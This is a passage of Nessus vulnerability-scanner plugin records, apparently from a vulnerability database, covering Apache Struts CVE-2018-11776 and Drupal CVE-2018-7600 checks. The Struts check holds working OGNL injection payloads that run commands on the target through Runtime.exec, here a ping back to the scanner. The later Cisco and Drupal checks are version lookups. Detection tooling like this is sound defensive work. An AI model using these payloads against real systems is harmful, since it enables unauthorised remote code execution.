(!thorough_tests) break;\n }\n match4 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match4))\n {\n urls = make_list(urls, match4[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = 
get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = \"ping%20-n%203%20-l%20500%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping%20-c%203%20-p%20\" + pat + \"%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\npayload_redirect = \"%24%7B%7B57550614+16044095%7D%7D/\";\npayload_redirect_verify_regex = \"Location: .*\\[73594709\\]\";\n\npayload_2_2 = \"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/\";\n\npayload_2_3 = 
\"%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29%29%7D/\";\n\nfunction namespace_inject(url, payload)\n{\n local_var bits, last, attack_url;\n\n # find the last / and put it after\n bits = split(url, sep:\"/\", keep:TRUE);\n last = max_index(bits) - 1;\n for (var i=0;i<last;i++)\n attack_url = attack_url + bits[i];\n attack_url = attack_url + payload;\n attack_url = attack_url + bits[last];\n\n return attack_url;\n}\n\nforeach var url (urls)\n{\n # first we try the 2.3.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_3);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n var snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). 
Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # next we try the 2.2.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_2);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # and finally, we try a simple redirect namespace injection\n attack_url = namespace_inject(url:url, payload:payload_redirect);\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n report =\n '\\nNessus confirmed this issue by injecting a simple OGNL addition payload'+\n '\\n( ${{57550614+16044095}} ) into a redirect action namespace. 
Below is' +\n '\\nthe response :'+\n '\\n\\n' + snip +\n '\\n' + res[1] +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:33", "description": "According to its self-reported version, the Cisco Unified Communications Manager (CUCM) running on the remote device is affected by a remote code execution vulnerability. Please see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager"], "id": "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "href": "https://www.tenable.com/plugins/nessus/112289", "sourceData": "#TRUSTED 
5538e58acd3b9c3603d69886501b4d03206d911e89a8d42c5b4e7eca707c4d625bc7498ef348a9ccbcb5336c36a12a8c522e9b7208a928417ca393d93d9b75b3674b5020a3adf4e9ded633106ddd86864d79657cbdb95644342b2f275592d8f9e6fc1f66ff78f01c1325c212b34be69ad9e19e9079abea97ba850b3de2a5b4c17ea6bcb025e35351d747f7a3bfd9a692abe32cfb1acd6df9a1ed4437cef173f52741ba940ea420a6a307c28113c77d3911f694bbd8b4770b2e393e952b7721160a3ace2b9a105b946878666ddb6b6277e8dd37cc0b540d3cab9ba05675333685d3567dc787a898345d49807afa2c4e8dadc80157671c59645ec28d4d731254f700afcdde8541b7fc40f5bf22104a815dfb9ffec8005793c65a930bc671999876981b110d057967ac4aec3e59486c42d91bfdbacd15266c2227ee145c9c1f68b594923b7c279533429a89c5a243111afa033972ae83c9fc79e2601de851679ed9c299cb484ffd80c57ac3b34925bb3cba116fcda0316d36ecd2faa6315da0eb4e36614b14339a5b4a8bf1733e633b7f9f29f76f24eb6dbba11d66280d6e3e0195481f24ff5256f30dbac9ca2fbd0297cc6cc377e602403cf222d850e159cf5a4a46f673c55f9ece04e1b4703056a271d88239f32fd0101e729543bc9b902ffe81653218ce1f59a8de7edc84c8cd3a6afeafbbf24ba8b4385bcd815cde5a4733f9\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112289);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14042\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote 
device is affected\nby a remote code execution vulnerability. Please see the included\nCisco BID and the Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14042\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14042.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n 
script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Communications Manager\");\n\nversion_list = make_list(\n '11.0.1.10000.10',\n '11.5.1.10000.6',\n '12.0.1.10000.10',\n '12.5.0.98000.981');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['display_version'],\n 'bug_id' , \"CSCvm14042\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:17", "description": "According to its self-reported version, the Cisco Unified Communications Manager IM & Presence Service is affected by a Remote Code Execution vulnerability. 
Please see the included Cisco BIDs and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager_im_and_presence_service", "cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "href": "https://www.tenable.com/plugins/nessus/112288", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112288);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14049\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)\");\n script_summary(english:\"Checks the Cisco Unified Communications Manager version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager IM & Presence Service is affected by a Remote\nCode Execution vulnerability. 
Please see the included Cisco BIDs and\nthe Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14049.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/UCOS/Cisco Unified Presence/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Presence\");\n\nversion_list = make_list('11.0.1', '11.5.1', '12.0.1');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14049\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:50", "description": "According to its self-reported version, the Cisco Identity Services Engine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-08-31T00:00:00", "type": "nessus", "title": "Cisco Identity Services Engine Struts2 Namespace Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/h:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine_software"], "id": "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "href": "https://www.tenable.com/plugins/nessus/112219", "sourceData": "#TRUSTED 
97aa159b84dc044b30c1959493ad4c2ef0b54f85d3e848f88bee9278a7ddad8a181a74909f1d0d76ce1b6789d6c52e06d8149ee1cd6b40ddc4809e01f93833be8020dacc4dd4a97c9adce91fde281659f57715154563c57a7067c369b7d014b2a20c63c0692370955493497ee5cc676ed67b7252f230321c84a756e4f7c6d300d603cb3a8441874a6b4a31d3e38b204cdfedfac2e159a1a6050a4e54e7e7d3a571f78bedb4ce38b25be27cfd186ec5a6d7ecb38bfcfc47307d6e8f2129c339cc2a40a9c1c376b220a07abb868589c8dd6bda1077121b2eaf32b235e36d05a0421ed24805286671b039794ad9999fff2a8ceea76e4cc2f7cf8611fd9b28ec473949aba55b3f4a0cfd91455716d0733c829031593c83528f5d8fbcb05351beaad63c70c1095d11b5d38e04cba7fd3800c21beb5e6382e20a3ccb6d00ac98d43d6ea3f1ff6566edeb9f0e8d98068cf9d6c881c0642ffda92b77e30b7b7ddf74136dca18b0813568c2f591018a81531bae509d7df421eef82e4d4fba2ffd1b76b3a561e1018e2630dac16d14f05b6342fb8c08ca13b94882eb818ba59f9f11fce385b9a3bf4dd7f0524b9d50096716733342ac10b83b1e52ba609ba841786810a1c88816deeb90ef81ff652cb02d46c1babdec6c8b9d00657c051ee857779d7fd75b624224079533e69b4308b4ee87d8a1cc79d022715df20de81e55f351e7a543e7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112219);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14030\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Identity Services Engine Struts2 Namespace Vulnerability\");\n script_summary(english:\"Checks the Cisco Identity Services Engine Software version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Identity Services\nEngine Software is affected by a struts2 namespace 
vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for\nmore information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14030\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine_software\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ise_detect.nbin\");\n script_require_keys(\"Host/Cisco/ISE/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Identity Services Engine Software\");\n\nvuln_ranges = [\n { 'min_ver' : '2.0.0.0', 'fix_ver' : '2.0.0.306' },\n { 'min_ver' : '2.0.1.0', 'fix_ver' : '2.0.1.130' },\n { 'min_ver' : '2.1.0.0', 'fix_ver' : '2.1.0.474' },\n { 'min_ver' : '2.2.0.0', 'fix_ver' : '2.2.0.470' },\n { 'min_ver' : '2.3.0.0', 'fix_ver' : '2.3.0.298' },\n { 'min_ver' : '2.4.0.0', 'fix_ver' : '2.4.0.357' }\n];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\n# ISE version doesn't change when patches are installed, so even if\n# they are on the proper version we have to double check patch level\nrequired_patch = '';\nif (product_info['version'] =~ \"^2\\.4\\.0($|[^0-9])\") required_patch = '2';\nif (product_info['version'] =~ \"^2\\.3\\.0($|[^0-9])\") required_patch = '4';\nif (product_info['version'] =~ \"^2\\.2\\.0($|[^0-9])\") required_patch = '9';\nelse if (product_info['version'] =~ \"^2\\.1\\.0($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0\\.1($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0($|[^0-9])\") required_patch = '7';\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14030\",\n 'fix' , 'See advisory'\n);\n\n# uses required_patch parameters set by above 
version ranges\ncisco::check_and_report(product_info:product_info, reporting:reporting, workarounds:workarounds, workaround_params:workaround_params, vuln_ranges:vuln_ranges, required_patch:required_patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:53:01", "description": "The Drupal CMS installed on the remote host is affected by a remote command execution vulnerability. A remote, unauthenticated attacker can leverage this issue to execute arbitrary commands on the remote host.", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "nessus", "title": "Drupal Remote Code Execution Vulnerability (SA-CORE-2018-002) (exploit)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_CVE-2018-7600_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/109041", "sourceData": "Binary data drupal_CVE-2018-7600_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:43:10", "description": "According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9, 8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. 
It is, therefore, affected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-03-28T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_8_5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/108688", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108688);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9,\n8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. 
It is, therefore,\naffected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.58 / 8.3.9 / 8.4.6 / 8.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7600\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
